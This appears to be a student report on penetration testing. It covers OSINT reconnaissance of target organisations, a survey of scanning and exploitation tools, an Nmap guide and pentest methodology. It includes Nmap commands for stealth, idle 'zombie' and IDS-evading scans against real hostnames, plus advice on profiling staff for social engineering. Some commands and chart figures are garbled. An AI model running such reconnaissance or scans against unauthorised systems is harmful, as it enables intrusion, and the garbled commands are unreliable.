Passive Information Gathering: Passive Information Gathering is generally only useful if there is a very clear requirement that the information gathering activities never be detected by the target. This type of profiling is technically difficult to perform as we are never sending any traffic to the target organization neither from one of our hosts or anonymous hosts or services across the Internet. This means we can only use and gather archived or stored information. As such this information can be out of date or incorrect as we are limited to results gathered from a third party. Semi-passive Information Gathering: The goal for semi-passive information gathering is to profile the target with methods that would appear like normal Internet traffic and behavior. We query only the published name servers for information, we arent performing in-depth reverse lookups or brute force DNS requests, we arent searching for unpublished servers or directories. We arent running network level portscans or crawlers and we are only looking at metadata in published documents and files; not actively seeking hidden content. The key here is not to draw attention to our activities. Post mortem the target may be able to go back and discover the reconnaissance activities but they shouldnt be able to attribute the activity back to anyone. Active Information Gathering: Active information gathering should be detected by the target and suspicious or malicious behavior. During this stage we are actively mapping network infrastructure (think full port scans nmap p1-65535), actively enumerating and/or vulnerability scanning the open services, we are actively searching for unpublished directories, files, and servers. Most of this activity falls into your typically reconnaissance or scanning activities for your standard pentest.
Per location listing of full address, ownership, associated records (city, tax, legal, etc), Full listing of all physical security measures for the location (camera placements, sensors, fences, guard posts, entry control, gates, type of identification, suppliers entrance, physical locations based on IP blocks/geolocation services, etc
Pervasiveness
It is not uncommon for a target organization to have multiple separate physical locations. For example, a bank will have central offices, but they will also have numerous remote branches as well. While physical and technical security may be very good at central locations, remote locations offen have poor security controls.
Relationships
Business partners, customs, suppliers, analysis via whats openly shared on corporate web pages, rental companies, etc. This information can be used to better understand the business or organizational projects. For example, what products and services are critical to the target organization? Also, this information can also be used to create successful social engineering scenarios.
Logical
Accumulated information for partners, clients and competitors: For each one, a full listing of the business name, business address, type of relationship, basic financial information, basic hosts/network information.
Business Partners
Business Clients
Competitors
Who are the targets competitors. This may be simple, Ford vs Chevy, or may require much more analysis.
Touchgraph
A touchgraph (visual representation of the social connections between people) will assist in mapping out the possible interactions between people in the organization, and how to access them from the outside (when a touchgraph includes external communities and is created with a depth level of above 2). The basic touchgraph should reflect the organizational structure derived from the information gathered so far, and further expansion of the graph should be based on it (as it usually represents the focus on the organizational assets better, and make possible approach vectors clear.
Gathering a list of your targets professional licenses and registries may offer an insight into not only how the company operated, but also the guidelines and regulations that they follow in order to maintain those licenses. A prime example of this is a companies ISO standard certification can show that a company follows set guidelines and processes. It is important for a tester to be aware of these processes and how they could affect tests being performed on the organization. A company will often list these details on their website as a badge of honor. In other cases it may be necessary to search registries for the given vertical in order to see if an organization is a member. The information that is available is very dependent on the vertical market, as well as the geographical location of the company. It should also be noted that international companies may be licensed differently and be required to register with different standards or legal bodies dependent on the country.
Org Chart Position identification
Document Metadata
What it is? Metadata or meta-content provides information about the data/document in scope. It can have information such as author/creator name, time and date, standards used/referred, location in a computer network (printer/folder/directory path/etc. info), geo-tag etc. For an
image its metadata can contain color, depth, resolution, camera make/type and even the coordinates and location information. Why you would do it? Metadata is important because it contains information about the internal network, user-names, email addresses, printer locations etc. and will help to create a blueprint of the location. It also contains information about software used in creating the respective documents. This can enable an attacker to create a profile and/or perform targeted attacks with internal knowledge on the networks and users. How you would do it? There are tools available to extract the metadata from the file (pdf/word/image) like FOCA (GUI-based), metagoofil (python-based), meta-extractor, exiftool (perl-based). These tools are capable of extracting and displaying the results in different formats as HTML, XML, GUI, JSON etc. The input to these tools is mostly a document downloaded from the public presence of the client and then analyzed to know more about it. Whereas FOCA helps you search documents, download and analyzes all through its GUI interface.
Network Blocks owned by the organization can be passively obtained from performing whois searches. DNSStuff.com is a one stop shop for obtaining this type of information. Open Source searches for IP Addresses could yield information about the types of infrastructure at the target. Administrators often post ip address information in the context of help requests on various support sites.
Email addresses
E-mail addresses provide a potential list of valid usernames and domain structure E-mail addresses can be gathered from multiple sources including the organizations website.
The target's external infrastructure profile can provide immense information about the technologies used internally. This information can be gathered from multiple sources both passively and actively. The profile should be utilized in assembling an attack scenario against the external infrastructure.
Technologies used
OSINT searches through support forums, mailing lists and other resources can gather information of technologies used at the target Use of Social engineering against the identified information technology organization Use of social engineering against product vendors
Purchase agreements
Purchase agreements contain information about hardware, software, licenses and additional tangible asset in place at the target.
Remote access
Obtaining information on how employees and/or clients connect into the target for remote access provides a potential point of ingress. Often times link to remote access portal are available off of the target's home page How To documents reveal applications/procedures to connect for remote users
Application usage
Gather a list of known application used by the target organization. This can often be achieved by extracting metadata from publicly accessible files (as discussed previously)
Defense technologies
Fingerprinting defensive technologies in use can be achieved in a number of ways depending on the defenses in use.
Passive fingerprinting
Search forums and publicly accessible information where technicians of the target organisation may be discussing issues or asking for assistance on the technology in use Search marketing information for the target organisation as well as popular technology vendors Using Tin-eye (or another image matching tool) search for the target organisations logo to see if it is listed on vendor reference pages or marketing material
Active fingerprinting
Send appropriate probe packets to the public facing systems to test patterns in blocking. Several tools exist for fingerprinting of specific WAF types. Header information both in responses from the target website and within emails often show information not only on the systems in use, but also the specific protection mechanisms enabled (e.g. Email gateway Anti-virus scanners)
Human capability
Discovering the defensive human capability of a target organization can be difficult. There are several key pieces of information that could assist in judging the security of the target organization.
Check for the presence of a company-wide CERT/CSIRT/PSRT team Check for advertised jobs to see how often a security position is listed
Check for advertised jobs to see if security is listed as a requirement for non-security jobs (e.g. developers) Check for out-sourcing agreements to see if the security of the target has been outsourced partially or in its entirety Check for specific individuals working for the company that may be active in the security community
Financial Reporting
The targets financial reporting will depend heavily on the location of the organization. Reporting may also be made through the organizations head office and not for each branch officeWhat is it: EDGAR (the Electronic Data Gathering, Analysis, and Retrieval system) is a database of the U.S. Security and Exchanges Commission (SEC) that contains registration statements, periodic reports, and other information of all companies (both foreign and domestic) who are required by law to file.
Why do it: EDGAR data is important because, in additional to financial information, it identifies key personnel within a company that may not be otherwise notable from a companys website or other public presence. It also includes statements of executive compensation, names and addresses of major common stock owners, a summary of legal proceedings against the company, economic risk factors, and other potentially interesting data.
2.2 Pentest
Tools
OpenVAS
OpenVAS is a vulnerability scanner that was forked from the last free version of Nessus after that tool went proprietary in 2005. OpenVAS plugins are still written in the Nessus NASL language. The project seemed dead for a while, but development has restarted
Core Impact
Core Impact isn't cheap (be prepared to spend at least $30,000), but it is widely considered to be the most powerful exploitation tool available. It sports a large, regularly updated database of professional exploits, and can do neat tricks like exploiting one machine and then establishing an encrypted tunnel through that machine to reach and exploit other boxes. Other good options include Metasploit and Canvas.
Nexpose
Rapid7 Nexpose is a vulnerability scanner which aims to support the entire vulnerability management lifecycle, including discovery, detection, verification, risk classification, impact analysis, reporting and mitigation. It integrates with Rapid7's Metasploit for vulnerability exploitation. It is sold as standalone software, an appliance, virtual machine, or as a managed
service or private cloud deployment. User interaction is through a web browser. There is a free "community edition" for scanning up to 32 IPs, as well as Express ($3,000 per user per year), Express Pro ($7,000 per user per year) and Enterprise (starts at $25,000 per user per year) editions.
GFI LanGuard
GFI LanGuard is a network security and vulnerability scanner designed to help with patch management, network and software audits, and vulnerability assessments. The price is based on the number of IP addresses you wish to scan. A free trial version (up to 5 IP addresses) is available.
QualysGuard
QualysGuard is a popular SaaS (software as a service) vulnerability management offering. It's web-based UI offers network discovery and mapping, asset prioritization, vulnerability assessment reporting and remediation tracking according to business risk. Internal scans are handled by Qualys appliances which communicate back to the cloud-based systemLatest
MBSA
Microsoft Baseline Security Analyzer (MBSA) is an easy-to-use tool designed for the IT professional that helps small and medium-sized businesses determine their security state in accordance with Microsoft security recommendations and offers specific remediation guidance. Built on the Windows Update Agent and Microsoft Update infrastructure, MBSA ensures consistency with other Microsoft management products including Microsoft Update (MU), Windows Server Update Services (WSUS), Systems Management Server (SMS) and Microsoft Operations Manager (MOM). Apparently MBSA on average scans over 3 million computers each week.
Secunia PSI
Secunia PSI (Personal Software Inspector) is a free security tool designed to detect vulnerable and out-dated programs and plug-ins that expose your PC to attacks. Attacks exploiting vulnerable programs and plug-ins are rarely blocked by traditional anti-virus programs. Secunia PSI checks only the machine it is running on, while its commercial sibling Secunia CSI (Corporate Software Inspector) scans multiple machines on a network.
Nipper
Nipper (short for Network Infrastructure Parser, previously known as CiscoParse) audits the security of network devices such as switches, routers, and firewalls. It works by parsing and analyzing device configuration file which the Nipper user must supply. This was an open source tool until its developer (Titania) released a commercial .
SAINT
SAINT is a commercial vulnerability assessment tool. Like Nessus, it used to be free and open source but is now a commercial product. Unlike Nexpose, and QualysGuard, SAINT runs on Linux and Mac OS X. In fact, SAINT is one of the few scanner vendors that don't support (run on) Windows at all.
Nessus
Nessus is an automatic vulnerability scanner that can detect most known vulnerabilities, such as misconfiguration, default passwords, unpatched services, etc. Pros and Cons of Nessus Pros a. Free vulnerability scanning. b. Check for effectiveness of patching Cons c. Some GUI isues still arises d. Less open than it was e. Definitely appears hostile when used Nessus vs Retina - Vulnerability Scanning Tools Evaluation The Test Environment The tested vulnerability scanning tools were installed on a Windows 7 Pro PC. The Scanning Process Both scanners were started with setting on full port scan, with disabled safety of scanning, and all available plugins were activated. NOTE: Since Retina does not have WebApplication Analysis, Nessus was run twice, once with WebApplications disabled, and once with WebApplication enabled in order to do a meaningful performance comparison. Performance
The Nessus scanner without WebApplication scan took 8 minutes to complete the scan The Nessus scanner with WebApplication scan took 67 minutes to complete the scan The Retina scanner took 38 minutes to complete the scan
Results
Both scanners failed to identify the target operating system The Nessus scanner identified the expected open ports, concluded that MySQL does not accept connections from unauthorized IP's. On a repeat scan, it regenerated the same results. The Retina scanner identified HTTP and TCP port 631 (IPP Printer Sharing). It did not identify the MySQL port as open. On the Web server, it identified a significant number of vulnerabilites, but did not collect any information from the HTTP server. On a repeat scan it missed the HTTP port and only identified the MySQL port. The Nessus Scanner running the WebApplication Scanning repeated the previous results and additionally it identified a significant number of WebApp vulnerabilites, and collected information from HTTP through web mirroring.
Conclusions Both scanners performed a very well vulnerability identification but missed the OS identification. Also, both manifested flaws: 1. Nessus missed the IPP port every time 2. Retina manifested erroneous scan results, identifying different ports and vulnerabilities during different sessions - while no configuration changes were made to the test environment. In terms of speed, without WebApplication Scan Nessus performed much faster then Retina. On the other hand, with active WebApplication Scan, Nessus was much slower then Retina. In terms of scan depth, Nessus has a small advantage, since it includes a web mirroring tool that is very helpful in HTTP. It can be clearly concluded that these tools cannot be used as the sole source of information when performing a vulnerability test. One must also utilize network mapping (NMAP, LanGuard), OS identification (NMAP) and specific application vulnerability scanners (ParosProxy, WebScarab for Web) for maximum effect. In a direct comparison, Nessus wins because 1. Retina manifested erroneous results on repeat scans, 2. The Nessus package includes a WebApplication scanning module, which in eEye products needs to be purchased as a separate application
NMAP
NMAP is primarily a host detection and port discovery tool. Instead of using Nessus to look for specific vulnerabilities against a known quantity of hosts, NMAP discovers active IP hosts using a combination of probes. Once a network scan is done, you can have NMAP look at specific hosts for open ports. NMAP can also attempt to gather additional information about the open ports such as finding out the version of a database running on one of your servers, but its bread
and butter is really the host detection and port scanning.One huge benefit of NMAPs open source roots is that it includes a scripting engine that allows users to create complex NMAP scripts. Scripts are broken into several categories including Auth (attempts to brute force attack authentication), discovery, intrusive and malware (which looks for malware infected machines)
Pros and Cons of NMAP Pros1. 2. 3. 4. Fastest , much reliable O.S and application version info Accepts IP address ranges , lists, file formats Front end available for command line inhabited
Cons1. Scanning may be considered hostile 2. SYN scanshave been known to crash some systems
A Simple Guide to Nmap Usage :What is Nmap? its short For Network Mapper. It is a free port scanner, released under GNU GPL. Written by Fyodor and with contributions from around the world. It is simple fast and very effective port scanners. It has gone under lots of changes and it is certainly the best one with more and more features added. Recent Addtion is Version Scanning which is very crusial against networks. It is the Port Scanner OF Choice. Infact Administrator's, Hackers Crackers, Script Kiddies and many more use it well it is released under GPL and was first written on linux. And a bit shocking thing about is that even microsoft has included it in its auditing tools list and recommends using nmap for scans. But a great tihng about Nmap is that lots of people have also put effort to port it to other platforms like Windows, BSD, MAC OS and it is sucessful so you can run it on any platform. It supports many types of scans and diferent types of flags are used and results are also very brief and easy to interpret. Infact Its a Port Scanner Of Choice.
TCP Connect Scan : This is the simplest form of scanning. It connects to every open
port on the target machine and lists the open ports, the idea behind this kind of scanning is simple if the port on the target machine is open and accepting connections the Connect() will succed and if the port is not listening it is considered as closed. For every unix user with less priviliges this is the default scanning option. It can be very usefull as it is fast as parellel scanning option can be used with TCP connect Scan. But this type of scanning has its own demerits like it can be easily detected and filtered, it also shows up lots of connection logs. An example of this is :-
#nmap sT 192.168.0.1 TCP SYN Scan : This type of scanning is also called as half open scanning, as a full TCP connection is not made to the target port on target machine. In this type of Scan first a SYN packet is send to the port which indicates the port as if a real connection is going to be established and if the port is open and listening it sends back a SYN|ACK which is the indication that the port is open and if we get the RST back with means that the port is not listening and it is closed and if we get SYN|ACK back we immediately send a RST packet back which closes down the connection. This type of scanning has an advantage that only a few systems monitor and log this type pof scan attempts. And a Demerit of this scanning technique is that you need to be root to form SYN packets. An example of this is :#nmap sS 192.168.0.1 TCP FIN Xmus and Null scans : Sometimes when it is not just enough to use SYN scans as it can be detected by packet filters when SYN packets are send to unlikely ports. And thats why FIN and Xmus and Null all these scans are able to by pass these type of filtering, in the technique when FIN packet is send to a open port the open port ignores the packet and a closed port immidiately send back a RST packet which tells nmap which port is open and which is close, But this type of scanning has its own merits and demerits as it is not effective against Microsoft Platform, and infact when ever a FIN packet is send to any port it replys with RST, but this can be used to discover that this system is Microsoft Based. An example of this is :-
<= This is FIN Scan <= This is Xmus Scan <= This is Null Scan.
Ping Scan : It is sometimes when you want to know which of the systems are up, and this is the most likely scan method to be used to determine systems which are up. This is done by sending ICMP echo packets to all the hosts specified and all those hosts that respond to these packets are up. But sometimes ICMP echo packets are blocked and so it fails in picking up systems that are alive. But infact our nmap is much more smarter in this respect and has a option which send TCP Ack packet to the target system by default this port is set to 80, and if the system responds with a RST packet, this is an indication that the system is up and the third technique is a SYN packet is send and awating a RST or SYN | Ack packet which indicates the system is up. An example of this is :-
UDP Scan : This type of Scanning is used to determine which UDP ports are open on the target host. In this type of scanning 0 byte udp packet it send to all the specified ports on the taget machine and if we get ICMP unreacheable then the port is assumed to be closed or else it is considered as open. But to its demerit is that sometimes ISPs often block these ports and so it sometimes throws incorrect results that the ports are open but infact it is not, so you need to be a bit more fortunate about these results. An example of this is :#nmap sU 192.168.0.1 Version Detection Scan : Recent Addition to Nmap is version detection, which determines the service running and the version number of the daemon running. It is really very useful as it shows up the versions and which can show the old and vulnerable daemons and this is where vulnerability scanners are used but nmap has done it by just Version detection technique, if you are really an nmap geek I doubt you need vulnerability scanners, in this type of scan a service fingerprint is made from the daemon which is compared to nmaps database of fingerprints and when it matchs it is sure that what service is running.
An example of this is :-
#nmap sV 192.168.0.1 Protocol Scan : This technique is used to know which IP protocols are supported on the targer host. This is done by sending raw ip packets to the host without any header of protocol and it is send to all the protocols on the target host.nmap probes for 256 protocol types and it is infact time consuming but it is useful somewhere or the other. An example of this is :#nmap sO 192.168.0.1 Ack Scan : This type of Scanning is used to map out firewall rulesets.It can detemine that the firewall is stateful or just a packe filter that blocks incoming SYN packets. In this type of scan an Ack packet is send to the port and if it replies with an RST it means it is unfiltered and it is open and if no reply is returned it is classified as filtered. An example of this is :-
#nmap sA 192.168.0.1 List Scan : This used to generate a list of IP addresses with out actually pinging or scanning them and also a DNS resolution is performed in this type of scan. An example of this is :#nmap sL yahoo.com RPC Scan : This type of scan uses a number of portscanning techniques, it finds all the TCP and UDP ports found and floods them with SunRPC program with Null commands to determine if it is a RPC service or not, it also catches up version number also. An example for this is :#nmap sR 192.168.0.1 Idle Scan : This type of scan is truly blind Scan. Which means that no packet is send from your own ip address. Instead another host is used which is often called as a Zombie with is used to scan the target machine and determine the open ports on the target machine, this is done by predecting the sequence numbers of the zombie host and used that host to scan our target, and if the target machine checks the ip of the scanning party the ip of the Zombie machine will show up. But it is best suited to use this technique at late nights when the zombie is idle to get the best results. There is a very nice paper written on Idle scanning, you can get it from securityfocus, I dont remember the link but u can search for it, and there is also an exclusive paper on idle scanning with nmap which u can get at insecure.org This type of scan also helps us to map out the trust releationship between hosts. With is crucial for Spoofing attacks. An example of this is :#nmap sI zombie.yahoo.com mail.yahoo.com Window Scan : This type of scan is very similar to Ack Scanning. It is use to map out open closed ports, filtered unfiltered ports due to anomaly in TCP window size reporting by each different operating system. Majority of *Nix Operating systems are vulnerable. An example of this is :#nmap sW 192.168.0.1 Different Types of Flags used in Scanning :-P0 :- If this flag is used it is an indication that Pinging the host is prohibited and during scanning the host Pinging is disabled. This is useful in many cases as some of the servers ignore icmp echo requests, so the host is scanned without discovering it with ping. With this TCP Ack Scan can also be used here like this PT80.
-PT :- This flag is used to determine which hosts are up. This is used when icmp echo reply packets are blocked. A TCP Ack packet is send to the target network and if the host replys with RST it is up or else it is down.
-PS :- This flag is uses SYN packets instead of Ack packets, but its limitations for packet constructing is only for root users. All the hosts that respond with RST or SYN|ACK the hosts are up and if nothing, then its assumed to be down.
-O :- This flag is used to identify the target operating system. This is done by comparing the already stored fingerprint database of nmap with that of the fingerprints genreated by the host. This technique also calculates the uptime of the computer, and also used to determine the TCP Sequence predectability -f :- This flag is used to evade intrusion detection systems and packet filtering systems and by pass all the scans with SYN , FIN , NULL, XMUS options. Packets are broken into tiny packets which are hard to be detected by IDS and Packet filters to detect.
-v :- This flag indicates verbose output. It means that it will print all information whats going on during the scan, And it can used to times to get more information.
-p :- This flag is used specify the custom port numbers you want to scan.different ports can be seperated using commas, ,. An example for this is :#nmap sT p 21,23,80,139,6000 192.168.0.1 -F :This flag is used for Fast scanning. When this flag is used the only ports specified in the nmap services file will be scanned. And this is what makes the scan very fast. -M :parallel scanning. This flag is used to specify maximum number of sockets to be used for
-T :This flag is used to specify the timing policy for the scan. This type of scanning can be used to evade Intrusion detection systems and it can also be used to make the Intrusion detection systems to start shouting :D. There are 5 options of timings.
:- This type is very slow and is very handy to evade IDS. :- This is a bit similar but waits only 15 seconds between sending packets. :- This type helps to ease the load on the network. :- This type of scanning is the normal scanning behavior. :- This type is used to make the scan a bit more fast. :- This type is the most quickest scan, I triggers IDSs.
Examples Of Scanning :-
#nmap sS -v 192.168.0.1 #nmap sT v 192.168.0.1 #nmap sS sV -v 192.168.0.1 #nmap sT sV v 192.168.0.1 #nmap sT sV v P0 192.168.0.1 #nmap sP v 192.168.0.1-255 #nmap PT80 vv 192.168.0.1-255 #nmap sF vv 192.168.0.1 #nmap sO sV 192.168.0.1 #nmap sI P0 zombie.myhost.com yourhost.com #nmap sT sV p 21,23,79,80 192.168.0.1 #nmap sT sV T Paranoid 192.168.0.1 #nmap sT P0 T Insane M10 192.168.0.1
Metasploit
Metasploit took the security world by storm when it was released in 2004. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their list of modules. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. One free extra is Metasploitable, an intentionally insecure Linux virtual machine you can use for testing Metasploit and other exploitation tools without hitting live servers. Metasploit was completely free, but the project was acquired by Rapid7 in 2009 and it soon sprouted commercial variants. The Framework itself is still free and open source, but they now also offer a free-but-limited Community edition, a more advanced Express edition ($3,000 per year per user), and a full-featured Pro edition ($15,000 per user per year). Other paid exploitation tools to consider are Core Impact (more expensive) and Canvas (less). The Metasploit Framework now includes an official Java-based GUI and also Raphael Mudge's excellent Armitage. Pros and Cons of Metasploit Pros a. Growing community of users. b. Growing documentations c. Excellent tools to identify and exploit vulnerability Cons a. b. c. d. Do not expect all exploits may be upto date with latest exploits Lack of logging or reports Machine running Metasploit can be compromised It can be dangerous tool and may violate policy at our organization.
Aircrack
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It implements the best known cracking algorithms to recover wireless keys once enough encrypted packets have been gathered. . The suite comprises over a dozen discrete tools, including airodump (an 802.11
packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).
BackTrack
This excellent bootable live CD Linux distribution comes from the merger of Whax and Auditor. It boasts a huge variety of Security and Forensics tools and provides a rich development environment. User modularity is emphasized so the distribution can be easily customized by the user to include personal scripts, additional tools, customized kernels, etc.
Burp Suite
Burp Suite is an integrated platform for attacking web applications. It contains a variety of tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All of the tools share the same framework for handling and displaying HTTP messages, persistence, authentication, proxies, logging, alerting and extensibility. There is a limited free version and also Burp Suite Professional ($299 per user per year). Pros and cons of Burp Suite Pro Pros a. As a manual test tool it is top rated. Cons a. It lacks any Java script support which is very big limitation.
Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.
Hping
This handy little utility assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. Hping is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rule sets. It is also great for learning more about TCP/IP and experimenting with IP protocols. Unfortunately, it hasn't been updated since 2005. The Nmap Project created and maintains Nping, a similar program with more modern features such as IPv6 support, and a unique echo mode.
W3AF
W3af is an extremely popular, powerful, and flexible framework for finding and exploiting web application vulnerabilities. It is easy to use and extend and features dozens of web assessment and exploitation plugins. In some ways it is like a web-focused Metasploit.
Scapy
Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. Note that Scapy is a very low-level toolyou interact with it using the Python programming language. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more.
Ping/Telnet/Dig/Traceroute/Whois/netstat
While there are many advanced high-tech tools out there to assist in security auditing, don't forget about the basics! Everyone should be very familiar with these tools as they come with most operating systems (except that Windows omits whois and uses the name tracert). They can be very handy in a pinch, although more advanced functionality is available from Hping and Netcat.
Hydra
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.
Acunetix
Acunetix Web Vulnerability Scanner crawls Web sites, including Sites hosting Flash content, analyzes Web applications and SOAP-based Web services and finds SQL injection, Cross site
scripting, and other vulnerabilities. Acunetix Web Vulnerability Scanner includes an automatic JavaScript analyzer that enables security analysis of AJAX and Web 2.0 applications, as well as Acunetixs AcuSensor Technology that can pinpoint the following vulnerabilities among others: version check; Web server configuration checks; parameter manipulations, multirequest parameter manipulations, file checks, unrestricted file upload checks, directory checks, text searches, weak HTTP passwords, hacks from the Google Hacking Database, port scanner and network alerts, other Web vulnerability checks, and other application vulnerability tests. Scanner is able to automatically fill in Web forms and authenticate against Web logins, enabling it to scan password-protected areas. Additional manual vulnerability tests are supported by the Web Vulnerability Scanners built-in penetration testing tools, e.g., Buffer overflows, Subdomain scanning. The penetration test tool suite includes (1) HTTP Editor for constructing HTTP/HTTPS requests and analyzing the Web servers response; HTTP Sniffer for intercepting, logging, and modifying HTTP/HTTPS traffic and revealing data sent by a Web application; HTTP fuzzer, for sophisticated fuzz testing of Web applications input validation and handling of unexpected and invalid random data, W(virtual) Script scripting tool for scripting custom Web attacks; Blind SQL Injector for automated database data extraction. Acunetix Web Vulnerability Scanner includes a reporting module that can generate compliance reports for PCI DSS and other regulations/standards. The scanner is offered in Small Business, Enterprise, and Consultant editions. Acunetix Web Vulnerability Scanner
2.3 Merits and Demerits of Penetration Testing tools and its graph
Acunetix Appscan Burp Suite Pro 63% Hailstorm NMAP Nessus Metasploit
54%
64%
61%
92%
91%
87%
36%
16%
53%
39%
8%
9%
11%
6.2 min
7.1 min
4.8 min
3.6 min
1.18 min
1.25 min
2.48 min
Performance
66%
68%
70%
67%
81%
76%
74.25%
Accuracy
51%
67%
62%
70%
88%
82%
79%
Reliability
59%
62%
65%
72%
93%
82%
77%
3%
9%
2%
8.5
37.5%
19%
21%
3.1 Penetration testing in current industry, 3.2 Vulnerability Assessment, 3.3 Roles and Responsibilities of Penetration testers 3.4 Proposed Work 3.1 Penetration testing in current industry
With the emergence of the Internet, web applications have penetrated deeper and deeper into the enterprise. Initially used as a public interface towards customers and mostly serving marketing purposes, web applications have grown into complex, multilayer solutions that serve diverse purposes in modern organizations and enterprises. From a public marketing interface, web applications have integrated the internal network, serving a multitude of purposes people management, accounting, support, document management, asset management, etc. Web applications have largely replaced traditional Desktop applications in most modern organizations and businesses. Services that have traditionally been served by numerous other types of applications are now often delivered by web applications. The ease of development of web applications is the primary reason for their deep integration into modern networks. However, it is also the primary reason why so many web applications are prone to often serious security weaknesses and vulnerabilities. Currently web applications are the single most attacked service type on the Internet.
Reconnaissance
Discovery
Identification
Exploitation
Rating
Reconnaissance
Information Analysis
Discovery
Cookies Gathering
Identification
Vulnerability databases
Manual Identification
Exploitation
Manual Exploitation
Vulnerability Rating
Vulnerability rating
The general Penetration Testing Methodology is based on a circular approach of 5 continuous phases, as described in the diagram above. During a typical engagement, the tester starts with the Reconnaissance phase, then moves forward until the Rating phase. The whole process is repeated on several occasions if needed in order to obtain results that are as accurate as possible. The Web Application Penetration Testing service is based on a methodology that is based on the OWASP web application testing methodology, but also general penetration testing methodologies, such as: OISSG ISSAF or SANS. Our vision is that although it is important to follow a general methodology, penetration testers should have the ability to change the methodology they are using and adapt it to each particular test. This vision reflects the way real attackers would proceed professional attackers will deviate from a methodology or process in order to achieve their goal. Following is a general description of the 5 phases approach that is followed throughout Web Application Penetration Testing engagements: Reconnaissance - The Reconnaissance Phase encompasses the actions taken by the security consultant to gain better knowledge about the target web application, but also its design or functions. Different methods are employed to obtain as much information as possible about the target web application, including the use of external sources, such as search engines, public forums, newsgroups, etc. The consultant will also attempt to identify precisely the target web server, application server, operating systems, development environments, back-end database, etc. Discovery - The Discovery Phase encompasses the active gathering of information from the target web application. Using a set of tools and utilities, the security consultant will attempt to list the structure of the target web site. The result from this phase is typically a detailed scheme that describes the structure of the
web application or site and that provides the consultant with important information about weak points in the application. The consultant will use the information obtained throughout the phase to select target pages that are likely to contain security issues and vulnerabilities (ie. dynamic pages). Identification - During the Vulnerability Identification phase, the security consultant will attempt to identify security weaknesses, vulnerabilities or issues in the list of resources that were identified throughout the previous phases. The identification of security vulnerabilities and weaknesses in the target web application is performed using several methods, including the use of vulnerability assessment tools and utilities, the use of vulnerability databases and manual vulnerability identification. Exploitation - The Vulnerability Exploitation phase is the most critical part of a Web Application Penetration Testing engagement. During this phase, the security consultant will attempt to exploit the vulnerabilities that were previously discovered by performing an actual attack against the services in question. Several methods for exploitation are used, including manual exploitation, the use of custom exploitation scripts and the use of publicly available security exploits.
Rating - The primary objective of the Vulnerability Rating phase is to objectively rate the security vulnerabilities and weaknesses that have been discovered throughout the previous testing phases and to prepare all information that will be needed for the penetration testing report. The tester will also save all log information such as attack tool output, attack screenshots and vulnerability assessment scan reports. If the optional logging of packet captures was ordered the captures will be stored for the retention period.
3.2 Vulnerability Assessment Vulnerability: A flaw or weakness in system security procedures, design, implementation, or
internal controls that could be exercised (accidentally triggered or intentionally exploited) and result in a security breach or a violation of the systems security policy. Vulnerability assessments are a crucial component to network security and the risk management process. Internetworks and Transmission Control Protocol/Internet Protocol (TCP/IP) networks have grown exponentially over the last decade. Along with the advent of this growth, computer vulnerabilities and malicious exploitation have increased. Operating system updates, vulnerability patches, virus databases, and security bulletins are becoming a key resource for any savvy network administrator or network security team. It is the application of the patches and use of knowledge gained from these resources that actually make the difference between a secure network system and a network used as a backdoor playground for malicious hacker attacks. Starting with a system baseline analysis, routine vulnerability assessments need to be performed and tailored to the needs of the company to maintain a network system at a relatively secure level. There are two types of vulnerability assessments: network-based and hostbased. The assessment can be carried out either internally or outsource to a third-party vendor like Foundstone (www.foundstone.com) or Vigilante (www.vigilante.com). The initial vulnerability assessment should be performed internally with collaboration between the Information Technology (IT) department and upper management using the host-based approach. The scope of this paper outlines methods and guidelines to perform a basic hostbased vulnerability assessment with a review of the risk management process, performing a system baseline assessment, and finally, a basic vulnerability assessment.
Once the credible threats are identified, a vulnerability assessment must be performed. The vulnerability assessment considers the potential impact of loss from a successful attack as well as the vulnerability of the facility/location to an attack. Impact of loss is the degree to which the mission of the agency is impaired by a successful attack from the given threat. A key component of the vulnerability assessment is properly defining the ratings for impact of loss and vulnerability. These definitions may vary greatly from facility to facility. For example, the amount of time that mission capability is impaired is an important part of impact of loss. If the facility being assessed is an Air Route Traffic Control Tower, a downtime of a few minutes may be a serious impact of loss, while for a Social Security office a downtime of a few minutes would be minor. A sample set of definitions for impact of loss is provided below. These definitions are for an organization that generates revenue by serving the public.
Devastating: The facility is damaged/contaminated beyond habitable use. Most items/assets are lost, destroyed, or damaged beyond repair/restoration. The number of visitors to other facilities in the organization may be reduced by up to 75% for a limited period of time. Severe: The facility is partially damaged/contaminated. Examples include partial structure breach resulting in weather/water, smoke, impact, or fire damage to some areas. Some items/assets in the facility are damaged beyond repair, but the facility remains mostly intact. The entire facility may be closed for a period of up to two weeks and a portion of the facility may be closed for an extended period of time (more than one month). Some assets may need to be moved to remote locations to protect them from environmental damage. The number of visitors to the facility and others in the organization may be reduced by up to 50% for a limited period of time. Noticeable: The facility is temporarily closed or unable to operate, but can continue without an interruption of more than one day. A limited number of assets may be damaged, but the majority of the facility is not affected. The number of visitors to the facility and others in the organization may be reduced by up to 25% for a limited period of time.
Minor: The facility experiences no significant impact on operations (downtime is less than four hours) and there is no loss of major assets.
